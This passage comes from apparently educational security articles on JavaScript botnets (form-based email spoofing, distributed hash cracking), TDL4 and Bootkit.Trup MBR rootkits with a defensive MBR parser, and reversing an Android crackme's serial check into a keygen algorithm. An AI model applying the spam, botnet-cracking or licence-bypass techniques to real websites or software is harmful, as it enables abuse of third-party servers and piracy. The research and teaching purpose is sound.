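Per-IP rate limiting alone misses this pattern because each zombie's rate can stay modest; keying on the shared external Referer and the client count is what separates a botnet page from a busy legitimate link.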
2) Email Spam
Spam mails are largely sent using open-relay mail servers and botnet zombies. Though it would not be possible to use a regular open-relay mail server from JavaScript, it would still be possible to send such spam mails through the web equivalent of open-relay mail servers. Many websites have feedback sections which ask the user to enter their name, email ID, subject and feedback. Once these are entered and the form is submitted, the server crafts this in the form of an email, with hard-coded from and to mail addresses, and sends it to the internal mail server. Poorly designed websites would contain the from and to mail addresses in hidden form fields in the browser, and by overwriting them with external addresses it should be possible to send mails with spoofed addresses if the company’s mail server is also configured to operate in open-relay mode. Since only GET requests can be sent through COR, the feedback form should either be sending all data in the QueryString or it should not be differentiating between QueryString and POST parameters. Alternatively, if it is a JSP page then HTTP Parameter Pollution can be used to submit forms over GET.
3) Distributed password cracking

Password cracking has always been a task assigned to programs written in native code, with performance enhanced by writing some sections in Assembly. With its relatively slower execution rate, JavaScript has never been considered for performing such resource-intensive tasks. Things however have changed: JavaScript engines in modern browsers are becoming increasingly fast, and the concept of WebWorkers allows creation of dedicated background threads for the purpose of password cracking. During our tests it has been possible to observe password guessing rates of 100,000 MD5 hashes/second in JavaScript. This figure is still slow compared to native code, which can easily loop through a few million MD5 hashes/second on a machine of similar configuration. The JavaScript approach has been found to be on average about 100-115 times slower than native code, but it makes up for this in scalability: ~110 machines running the JavaScript password cracking program can match the cracking rate of one machine running a similar program written in native code. As shown in the previous sections it would be very easy to build a botnet of a few thousand zombies executing our JavaScript password cracker in the background. Even with 1100 zombies our cracking rate would be equivalent to that of having 10 machines of similar configuration running a password cracker written in native code. An effective botnet creation effort could potentially get hundreds of thousands of such zombies to crack password hashes, providing unimaginable computing capability. I have built Ravan[http://www.andlabs.org/tools/ravan.html], a JavaScript distributed hash cracking system which is an implementation of this concept, designed to be used for legitimate needs.
Lavakumar Kuppan lava@andlabs.org
Lava is a penetration tester and security researcher.
Rootkits are Back with the Boot Infection
Preface
Windows rootkits have been around since 2005 and have become a buzzword in the security industry over recent years. While rootkits have traditionally been used by sophisticated attackers to hide their presence on compromised machines, recent malware with rootkit capabilities has started using them to complicate efforts to detect and clean the infections. This article aims to give an idea of Windows rootkits and the advanced techniques observed in recent years, mainly rootkits with boot infections.

Windows Rootkits

This is not 2005, when the word "Rootkit" was not known to most people in the cyber world besides security researchers. For a long time the technique used by rootkits to hide the presence of malware, so that it could steal more information, send out more spam, launch more DDoS attacks and ultimately make millions of dollars, was a matter of concern only for cyber security researchers. But some legitimate commercial software also adopted the same technique for self-protection. Among all of them, Sony's Digital Rights Management (DRM) software received intense media attention and criticism in late 2005, and the word "Rootkit" became a common term in the cyber security world. You will find more than a dozen definitions of "Rootkit". To understand the term in a very simple manner, we have the following definition:

A rootkit is a set of tools used by an intruder after cracking a computer system. These tools can help the attacker maintain his or her access to the system and use it for malicious purposes. Rootkits exist for a variety of operating systems. The term rootkit is used to describe the mechanisms and techniques whereby malware, including viruses, spyware, and trojans, attempt to hide their presence from antispyware, antivirus, and various system management utilities.
In other words, a rootkit is a set of programs and code that allows a permanent or consistent, undetectable presence of other components, mostly malware. Windows rootkits are rootkits which work on versions of the Microsoft Windows operating system to hide the presence of malware components like files, registry entries, processes, drivers etc. They achieve this using techniques like user-mode hooking, SSDT hooking, IRP hooking and Direct Kernel Object Manipulation (DKOM).

Initially, PoC (proof of concept) Windows rootkits were constantly being released to demonstrate new methods of bypassing the rootkit detection and prevention mechanisms provided by various security vendors for the Windows operating system. Some proofs of concept were also published in one of the bestselling books about Windows rootkits, "Subverting The Windows Kernel: ROOTKITS". But eventually most of the PoCs were transformed into real-world rootkits that made their way into the hands of attackers. The current state of rootkits is no longer just an arms race but has become warfare between the rootkit writers and the anti-rootkit industry, which is responsible for protecting millions of systems.

Advanced Windows Rootkits with boot infection: TDSS

We can divide the Windows rootkits' era into two parts: pre-TDSS, and the TDSS (also known as TDL, Alureon) family. The TDSS family rootkit first appeared in 2008. Since then, it has become far more widespread than even notorious rootkits like Rustock. It has been more than two years since this family of rootkits began to evolve. The rootkit writers of this family have developed one of the most sophisticated and advanced mechanisms for bypassing various protective measures and security mechanisms embedded into the operating system. TDSS implements the concept of infecting operating system drivers and the MBR; this means it is loaded and run at the very early stages of the operating system.
This effectively complicates the detection of TDSS and makes the task of cleaning it very difficult and challenging. TDL4 is the most recent high-tech and widely spread member of the TDSS family, targeting x64 operating systems too, such as Windows Vista and Windows 7. One of the most striking features of TDL4 is that it is able to load its kernel-mode driver on systems with an enforced kernel-mode code signing policy (64-bit versions of Microsoft Windows Vista and 7) and perform kernel-mode hooks with the kernel-mode patch protection policy enabled. When the driver is loaded into kernel-mode address space it overwrites the MBR (Master Boot Record) of the disk by sending SRB (SCSI Request Block) packets directly to the miniport device object, then it initializes its hidden file system. The bootkit's modules are written into the hidden file system from the dropper. The TDL4 bootkit controls two areas of the hard drive: one is the MBR and the other is the hidden file system created at the time of malware deployment. When any application reads the MBR, the bootkit changes the data and returns the contents of the clean MBR, i.e. the one prior to the infection; it also protects the infected MBR from being overwritten. The hidden file system with the malicious components is also protected by the bootkit: if any application attempts to read the sectors of the hard disk where the hidden file system is stored, it returns a zeroed buffer instead of the original data. The bootkit contains code that performs additional checks to prevent the malware from being cleaned up.
At every start of the system the TDL4 bootkit driver gets loaded and initialized by performing the following tasks:
- Reads the contents of the boot sector and compares it with the infected image stored in the hidden file system; if it finds any difference between these two images it rewrites the infected image to the boot sector.
- Sets the DriverObject field of the miniport device object to point to the bootkit's driver object and also hooks the DriverStartIo field of the miniport's driver object.
- If kernel debugging is enabled, TDL4 does not install any of its components.

The TDL4 rootkit hooks the ATAPI driver, i.e. standard Windows miniport drivers like atapi.sys. It keeps its device object at the lowest position in the device stack, which makes it a lot harder to dump TDL4 files. All these striking features have made TDL4 the most notorious Windows rootkit, and it is also very important to mention that the key to its success is the boot sector infection.

Stealthy variant of Bootkit.Trup

We will go through the technical details of one more new-generation malware with bootkit ability which is simpler in design than TDL4 but again uses boot infection as a key. The new variant of Bootkit.Trup was making rounds 2-3 months back, updated to protect the infected MBR. The encryption used in Bootkit.Trup.B is very similar to that of its old variant Bootkit.Trup.A, which is a simple rotate right (ROR) operation. It gets the drive geometry of the infected disk and then calculates a position near the end of the partition to store the original MBR and other components. These components are written into an unallocated part of the partition; in case the disk becomes full there is a chance of them getting overwritten with other data.
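Both bootkits above hinge on two things an analyst can measure from an image of sector 0: what the MBR actually contains and how much unpartitioned space follows the last partition. The parser below is an added example, not code from the article or from Quick Heal; the 512-byte images it inspects are constructed here (the bootstrap bytes, the single partition and the 409600-sector disk size are made-up values), and a real image should come from an offline read of the disk, since a running bootkit filters reads of the infected sectors.

```python
"""Inspect a 512-byte MBR image the way a bootkit hunter would.

Added example (not from the article): checks the 0x55AA signature, decodes the four
partition entries, measures the unpartitioned tail of the disk (where TDL4 keeps its
hidden file system and Bootkit.Trup stores the encrypted original MBR), and compares
the bootstrap code against a trusted baseline hash. Sample images are constructed.
"""
import hashlib
import struct

SECTOR = 512
BOOT_CODE_LEN = 446          # bytes 0..445: bootstrap code
PART_TABLE_OFF = 446         # four 16-byte partition entries follow
SIGNATURE = b"\x55\xaa"      # bytes 510..511


def parse_partitions(mbr):
    """Return the non-empty partition entries as dicts (index, bootable, type, lba_start, sectors)."""
    parts = []
    for i in range(4):
        off = PART_TABLE_OFF + 16 * i
        status, _chs_start, ptype, _chs_end, lba_start, count = struct.unpack_from(
            "<B3sB3sII", mbr, off)
        if ptype != 0:   # type 0x00 marks an unused entry
            parts.append({"index": i, "bootable": status == 0x80, "type": ptype,
                          "lba_start": lba_start, "sectors": count})
    return parts


def unpartitioned_tail(mbr, total_sectors):
    """Sectors after the end of the last partition: free space a bootkit can hide components in."""
    ends = [p["lba_start"] + p["sectors"] for p in parse_partitions(mbr)]
    return total_sectors - max(ends) if ends else total_sectors


def inspect_mbr(mbr, total_sectors, baseline_boot_sha256=None):
    """Produce findings for one MBR image; the baseline hash of known-good boot code is optional."""
    if len(mbr) != SECTOR:
        raise ValueError("MBR image must be exactly 512 bytes")
    findings = {
        "signature_ok": mbr[510:512] == SIGNATURE,
        "partitions": parse_partitions(mbr),
        "unpartitioned_tail": unpartitioned_tail(mbr, total_sectors),
        "boot_code_sha256": hashlib.sha256(mbr[:BOOT_CODE_LEN]).hexdigest(),
    }
    if baseline_boot_sha256 is not None:
        findings["boot_code_modified"] = findings["boot_code_sha256"] != baseline_boot_sha256
    return findings


def build_sample_mbr(boot_code):
    """Constructed MBR: the given bootstrap bytes, one bootable NTFS-type partition, valid signature."""
    body = boot_code.ljust(BOOT_CODE_LEN, b"\x00")
    entry = struct.pack("<B3sB3sII", 0x80, b"\x00\x00\x00", 0x07, b"\x00\x00\x00", 2048, 204800)
    table = entry + b"\x00" * 48          # remaining three entries unused
    return body + table + SIGNATURE


CLEAN_MBR = build_sample_mbr(b"\x33\xc0\x8e\xd0\xbc\x00\x7c")   # constructed "clean" boot code
INFECTED_MBR = build_sample_mbr(b"\xea\x00\x00\x00\x00")         # constructed altered boot code
CLEAN_BASELINE = hashlib.sha256(CLEAN_MBR[:BOOT_CODE_LEN]).hexdigest()
DISK_SECTORS = 409600   # constructed 200 MiB disk

if __name__ == "__main__":
    for name, img in (("clean", CLEAN_MBR), ("infected", INFECTED_MBR)):
        f = inspect_mbr(img, DISK_SECTORS, CLEAN_BASELINE)
        print(name, "boot code modified:", f["boot_code_modified"],
              "unpartitioned tail sectors:", f["unpartitioned_tail"])
```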
The original MBR and driver component are stored in encrypted form using the same encryption. The driver component hooks ATAPI's DriverStartIo routine, where it monitors for write operations. In case of a write operation targeted at the MBR sector, it is changed to a read operation. This way it tries to bypass repair operations by security products. An MBR protection mechanism was previously seen in TDSS.TDL4, which sits at the bottom of the storage stack to monitor read and write operations to the first sector and to its encrypted components in unpartitioned disk space. Having insight into the technical details of these new-generation Windows rootkits, the reader must have got an idea of how difficult it is for anti-rootkit tools to counter them.

Conclusion

In the past few years there were no great concerns about malware infecting boot sectors, and it was even said to be no longer in the wild. But looking at the changing threat landscape in the last year or two, we have to mention that these types of malware are coming back with more rootkit capabilities. Most of the anti-rootkit software available fails to detect the presence of these rootkits, as these anti-rootkit tools use techniques like cross-view based detection, user-mode or kernel-mode hook detection or DKOM detection. These rootkits don't provide any chance to scan the "rooms" where their components reside. As current anti-rootkit software is not helping us much in tackling such highly advanced rootkits, the need for specialized bootkit detection and removal tools arises. Most security vendors have already developed and released such specialized tools to counter these rootkits. Analysis of such complex malware becomes harder with the unavailability of dropper samples.
The war against rootkits has been taken to a new battleground, as the insights from the case studies mentioned above give a clear idea of how a rootkit driver protects the infected Master Boot Record, which keeps those advanced rootkits ahead of traditional bootkits. We have to be ready for all such techniques never seen before in malware threats and for the next generation of rootkits, bootkits, kernel infectors and boot sector infectors written by highly technical and professional malware writers.

Credits

I would like to give sincere thanks to Mr. Sanjay Katkar (CTO, Quick Heal Technologies) for his most valuable guidance. I would also like to thank my colleagues Mr. Rajesh Nikam and Mr. Rajendra Kumbhar for their help in the analysis and valuable inputs.

Swanand Shinde
Swanand Dattaram Shinde has been working with Quick Heal Technologies (P) Ltd. since 2005 as a Sr. Software Engineer. He holds a Master's in Computer Science. He is currently working in Research and Development of the Quick Heal antivirus. He has researched various security products like antivirus, anti-rootkit etc.
Introduction

Recently, the open source mobile operating system Android has gathered a large community of developers writing applications that extend the functionality of supporting devices. It seems a lot of people are getting crazy about the Android platform these days (everyone is trying to buy an Android phone!). I don't have an Android cell phone, but still I did manage to learn a few tricks on this Linux + Java clean-room engineered platform. In this article I shall explain, with an example, the simple technique of reverse engineering a normal Android application.
Setting up the Ground

For the purpose of a demonstration, I have chosen an Android crackme application published by Deurus and explain the steps involved to legally reverse engineer this application. Our objective (don't get the wrong idea, friends!) is to break the licensing scheme of this application. So to begin our journey we first need to get geared up: first we need the Android SDK and then the necessary tools.
You can download the necessary files from these locations:
Android SDK: http://developer.Android.com/sdk/index.html
Smali and baksmali: http://code.google.com/p/smali/
Dex2jar: http://code.google.com/p/dex2jar/
Java decompiler: http://java.decompiler.free.fr/
Deurus Android crackme 03: http://crackmes.de/users/deurus/android_crackme03/
Getting Started with the Game

Download all these files to your hard disk. Unzip the Android SDK to C:\. Unzip the rest of the tools to C:\android-sdk-windows\RE. If everything is in order you can start the Android SDK manager from C:\android-sdk-windows\. It will give you a list of packages to download and install; we need to select at least one SDK platform to continue our quest. After downloading and installing, we can move on to creating a new Android Virtual Device (AVD).
After creating the AVD, we can start emulation by selecting the AVD and clicking the start button. Within a few minutes we can see the emulator booting up and showing the phone screen. That's it! We have our emulator up and running. Now we need to install the software (the crackme, it's legal!) on the emulator. For that you may have to get acquainted with the Android Debug Bridge (adb). Installing an apk file is pretty simple; all you have to do is run two commands from the Android SDK directory/tools.
After the installation you can see the crackme icon from application menu.
Now run the crackme by clicking on it. If everything went as expected you will see the crackme application on the screen.
Now let's play with it a bit: pressing the check button with no input pops up the message 'Min 4 chars', and pressing it with a proper name pops up the message 'Bad boy'. Remember these strings, because we will be using them as our search keys when we disassemble the apk (actually the dex) files. Also note that we have two hardware IDs, and we need to find out what exactly they mean.
Now for real Reverse Engineering

As our crackme is up and running in the emulator, we can now move on to the reversing part. If you have read about the APK file format, you can visualize it as an extended JAR file, which is essentially a zip file. So you can rename the crackme from 'Crackme03.apk' to 'Crackme03.zip' and decompress it to any folder.
Now the interesting file for us is 'classes.dex', which contains the compiled virtual machine (VM) code. We are now going to disassemble the dex file with baksmali. The commands are pretty simple, as shown in the screenshots below.
If everything worked fine, we will have a folder structure similar to Java packages. The interesting .smali files are located at '\com\example\helloandroid'. Open all the .smali files in your favorite text editor (I use Notepad++).
If you have never done anything related to reverse engineering, esoteric programming or assembly (IL) programming, don't start sweating. We have just opened a disassembled dex file. Next, if you are wondering how on earth someone can find the correct location of a checking function, well, I hope you remember those pop-up strings I mentioned earlier: 'Min 4 chars' and 'Bad boy'. It is time to use those strings as our search keys. After searching for 'Min 4 chars' in all the opened .smali files, we find a hit in the file HelloAndroid$2.smali, specifically at line 130.
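The string-search step just described, automated: an added example (not code from the article or from the smali project) that walks baksmali output and reports the class, method and nearest .line directive for every const-string containing a search key. The smali text it runs on is a constructed, much-shortened stand-in for HelloAndroid$2.smali, not the crackme's real disassembly, so the reported line numbers are illustrative.

```python
"""Locate the method that emits a given UI string in baksmali output.

Added example, not from the article. Tracks the enclosing .class and .method
directives and the most recent .line directive, and records every const-string
whose value contains the search key. The SAMPLE_SMALI below is constructed.
"""
import re

CLASS_RE = re.compile(r"^\.class\s+.*?(L[\w/$]+;)\s*$")
METHOD_RE = re.compile(r"^\.method\s+(?:[\w-]+\s+)*([\w<>$]+\(.*?\).*)$")
LINE_RE = re.compile(r"^\.line\s+(\d+)")
CONST_STRING_RE = re.compile(r'^const-string(?:/jumbo)?\s+[vp]\d+,\s*"((?:[^"\\]|\\.)*)"')


def find_string_uses(smali_text, needle):
    """Return [(class, method, source_line, string)] for each const-string containing needle.

    source_line is the value of the last .line directive seen inside the method, or None
    when the method carries no debug line info before the string load.
    """
    hits = []
    cls = method = src_line = None
    for raw in smali_text.splitlines():
        line = raw.strip()
        if m := CLASS_RE.match(line):
            cls = m.group(1)
        elif m := METHOD_RE.match(line):
            method = m.group(1)
            src_line = None
        elif line == ".end method":
            method = None
        elif m := LINE_RE.match(line):
            src_line = int(m.group(1))
        elif m := CONST_STRING_RE.match(line):
            if needle in m.group(1):
                hits.append((cls, method, src_line, m.group(1)))
    return hits


# Constructed, heavily abbreviated smali resembling the article's HelloAndroid$2.smali.
SAMPLE_SMALI = """\
.class Lcom/example/helloandroid/HelloAndroid$2;
.super Ljava/lang/Object;

.method public onClick(Landroid/view/View;)V
    .locals 25
    .line 80
    const/16 v22, 0x4
    if-ge v0, v1, :cond_51
    .line 86
    const-string v23, "Min 4 chars"
    const/16 v24, 0x1
    invoke-static/range {v22 .. v24}, Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/CharSequence;I)Landroid/widget/Toast;
    :cond_51
    .line 120
    const-string v23, "Bad boy"
    return-void
.end method

.method private helper()V
    .locals 1
    const-string v0, "unrelated"
    return-void
.end method
"""

if __name__ == "__main__":
    for key in ("Min 4 chars", "Bad boy"):
        for hit in find_string_uses(SAMPLE_SMALI, key):
            print(hit)
```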
Our aim now is to understand the serial checking function and write a keygen for it. For this we have to know all the Dalvik opcodes used here. You can visit this page (http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html) to understand the opcodes, and after that you can convert the disassembled code to much higher-level language constructs. Here I will provide a brief code snippet which actually implements the algorithm. The two hardware IDs used are the IMEI and the SIM serial number.
```smali
//Read name from text box
const v23, 0x7f050004
invoke-virtual/range {v22 .. v23}, Lcom/example/helloandroid/HelloAndroid;->findViewById(I)Landroid/view/View;
move-result-object v9

//Read serial from text box
const v23, 0x7f050006
invoke-virtual/range {v22 .. v23}, Lcom/example/helloandroid/HelloAndroid;->findViewById(I)Landroid/view/View;
move-result-object v21

//Checking whether the name is of length greater than 4
const/16 v22, 0x4
move v0, v11
move/from16 v1, v22
if-ge v0, v1, :cond_51

//Popup showing Min 4 chars
const-string v23, "Min 4 chars"
const/16 v24, 0x1
.line 86
invoke-static/range {v22 .. v24}, Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/CharSequence;I)Landroid/widget/Toast;
move-result-object v13
.line 88
.local v13, notificacionToast:Landroid/widget/Toast;
invoke-virtual {v13}, Landroid/widget/Toast;->show()V

//There is a little exception trick to make integer string from username
//It converts aaaa to 97979797 which is ascii equivalent
invoke-virtual {v10, v5}, Ljava/lang/String;->charAt(I)C
move-result v3

//Getting first 5 chars from ascii converted name
const/16 v22, 0x0
const/16 v23, 0x5
move-object v0, v12
move/from16 v1, v22
move/from16 v2, v23
invoke-virtual {v0, v1, v2}, Ljava/lang/String;->substring(II)Ljava/lang/String;

//Converting it into integer and xoring with 0x6B016 - Serial part 1
invoke-static {v12}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I
move-result v22
const v23, 0x6b016
xor-int v22, v22, v23

//Getting IMEI from TelephonyManager
//http://developer.Android.com/reference/Android/telephony/TelephonyManager.html
invoke-virtual {v8}, Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/String;
move-result-object v6
.line 102
.local v6, imei2:Ljava/lang/String;

//Getting sim serial
invoke-virtual {v8}, Landroid/telephony/TelephonyManager;->getSimSerialNumber()Ljava/lang/String;
move-result-object v16
.line 103
.local v16, simsn:Ljava/lang/String;

//Getting first 6 chars from IMEI, and similarly from sim serial (IMEI.Substring(0,6) will be used as Serial part 3)
const/16 v22, 0x0
const/16 v23, 0x6
move-object v0, v6
move/from16 v1, v22
move/from16 v2, v23
invoke-virtual {v0, v1, v2}, Ljava/lang/String;->substring(II)Ljava/lang/String;

//Converting them to integer and xoring - Serial part2
invoke-static/range {v19 .. v19}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I
move-result v22
invoke-static/range {v20 .. v20}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I
move-result v23
xor-int v22, v22, v23

//Making a new StringBuilder object and formatting the string to part1-part2-part3
new-instance v22, Ljava/lang/StringBuilder;
invoke-static {v12}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
move-result-object v23
invoke-direct/range {v22 .. v23}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
const-string v23, "-"
invoke-virtual/range {v22 .. v23}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
move-result-object v22
invoke-static/range {v17 .. v18}, Ljava/lang/String;->valueOf(J)Ljava/lang/String;
move-result-object v23
invoke-virtual/range {v22 .. v23}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
move-result-object v22
const-string v23, "-"
invoke-virtual/range {v22 .. v23}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
move-result-object v22
move-object/from16 v0, v22
move-object/from16 v1, v19
invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
move-result-object v22

//Checking whether user entered serial and program made serials are equal.
invoke-virtual {v14, v15}, Ljava/lang/String;->equals(Ljava/lang/Object;)
```
As you can see, the algorithm is pretty straightforward. It uses the name and two hardware IDs as input and does some operations on them to make a serial. We can quite easily recode it in any programming language we prefer to make a keygen. Anyway, I am not posting any keygen sources as it would spoil the whole phun!
Decoding the Algorithm

A demonstrative serial calculation routine is given below. Here are stepwise instructions on generating the final serial number:
- At first 'aaaaa' will be converted to '9797979797', from which we take the first 5 characters and convert them to the integer 97979. This will be XORed with 0x6B016, resulting in 511661, and this will be the first part of the serial.
- For the second part, we take the first 6 characters from HW ID1 and HW ID2, convert them to integers and XOR them, resulting in 000000^890141 = 890141.
- For the third part we use the first 6 characters from HW ID1.
- Formatting with the specified delimiter, the serial becomes '511661-890141-000000'.
Final Verification of Reversing

Now let us put the same magic number into our Crackme application.
Bingo! Everything worked as expected. Now, for all those who think it is pretty hard to read all those disassembled instructions and manually convert them to higher-level language constructs, there are other options. As Dalvik is based on the design of Java, it is also susceptible to decompilation. There is no decompiler available at this moment, but there is hope.
For now we can use another utility which converts dex files to jar files so that we can use Java decompilers to see much more abstracted code. At the start of this article you may have noticed the tool dex2jar. You can use dex2jar to convert classes.dex to classes.dex.dex2jar.jar. Open it in a Java decompiler and you will see much better output than the Dalvik disassembly. Please note that dex2jar is still in a development phase and the output you get could be meaningless in many places; it should be used only to get a quick understanding of all the functions.
Conclusion

In this introductory article, I explained the reversing of an Android application using the emulator and all the available tools in sequence, with pictorial, elaborative steps. It is mainly meant to set up your ground for further reversing work on the Android platform. Well, that's it! We have analyzed an Android program and defeated its protection. Cheerio!